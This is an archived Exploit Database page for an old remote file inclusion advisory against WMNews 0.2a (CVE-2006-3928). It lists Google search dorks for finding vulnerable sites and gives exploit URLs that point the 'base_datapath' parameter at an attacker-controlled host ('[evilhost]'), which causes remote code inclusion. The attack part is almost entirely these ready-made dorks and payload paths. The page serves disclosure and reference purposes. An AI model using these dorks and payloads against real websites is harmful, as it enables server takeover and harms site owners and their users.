Exploit Database - Logo

WMNews 0.2a - 'base_datapath' Remote File Inclusion

EDB-ID: 2077 Author: uNfz Published: 2006-07-27
CVE: CVE-2006-3928 Type: Webapps Platform: PHP
Aliases: N/A Advisory/Source: N/A Tags: Vulnerability
E-DB Verified: Verified Exploit: Download Exploit Code Download / View Raw Vulnerable App: N/A
« Previous Exploit Next Exploit » 
Advisory: WMNews Remote File Include Vulnerability
 Release Date: 2006/07/26
         Author: uNfz
  Critical Level: High
        Contact: unfzbr@hotmail.com
         Vendor: Warta Mikael

--------------------
--------------------

Searching / Dork:

allinurl: *.php?Artid=*
allinurl: *.php?ArtCat=*
allinurl: wmprint.php
allinurl: wmview.php

--------------------

exploration:

/index.php?config=1&base_datapath=http://[evilhost]
/[dir]/index.php?config=1&base_datapath=http://[evilhost]

--------------------

uNfz
irc.efnet.org

# milw0rm.com [2006-07-27]

Related Exploits

Trying to match CVEs (1): CVE-2006-3928
Trying to match OSVDBs (1): 27547
Other Possible E-DB Search Terms: WMNews 0.2a,  WMNews
Date D V Title Author
2010-01-04Download Exploit Code Verified WMNews - '/admin/wmnews.php' Cross-Site Scriptingindoushka
2006-03-10Download Exploit Code Verified WMNews - 'footer.php?ctrrowcol' Cross-Site ScriptingR00T3RR0R
2006-03-10Download Exploit Code Verified WMNews - 'wmcomments.php?ArtID' Cross-Site ScriptingR00T3RR0R
2006-03-10Download Exploit Code Verified WMNews - 'wmview.php?ArtCat' Cross-Site ScriptingR00T3RR0R
Menu